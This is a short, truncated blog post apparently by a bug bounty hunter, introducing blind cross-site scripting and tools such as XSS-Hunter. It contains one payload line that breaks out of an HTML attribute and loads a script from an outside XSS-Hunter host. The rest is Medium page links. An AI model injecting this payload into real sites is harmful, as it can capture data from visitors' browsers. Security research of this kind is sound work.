Blind-XSS Disappointment

A valid bug? or maybe we will just ignore you.

Image by me

Blind XSS is a relatively easy bug to find with the availability of tools like XSS-Hunter and Burp collaborator. When I started looking for bugs on public programs, it was my go-to bug. I’ve had success using the plain

"><script src=https://user.xss.ht></script>

--

--

--

Writer, Web Developer, Hacker, and Family man

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Fortress Protocol Governance & Updates

Elko Rehab | Rehab Elko

Proposal to Distribute Origin Story Platform Fees to OGN Stakers Has Passed

CertiK audit analysis

MAIAR EXCHANGE — Internet-scale DeFi with an inexpensive fee structure

How to hack your way to an OSCP or any cert voucher through Synack and Hack the Box.

{UPDATE} Cradle of Kings Hack Free Resources Generator

Forensic Analysis to Anydesk: Forensic Artifacts and Log Analysis [ENG]

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Adam W.

Adam W.

Writer, Web Developer, Hacker, and Family man

More from Medium

On the way to 2nd Bounty XSS and Apache server .

Stumbling into the bug of another

2FA Misconfiguration leads to adding any number as 2FA verification

A Curious Glitch in XSS Sanitizing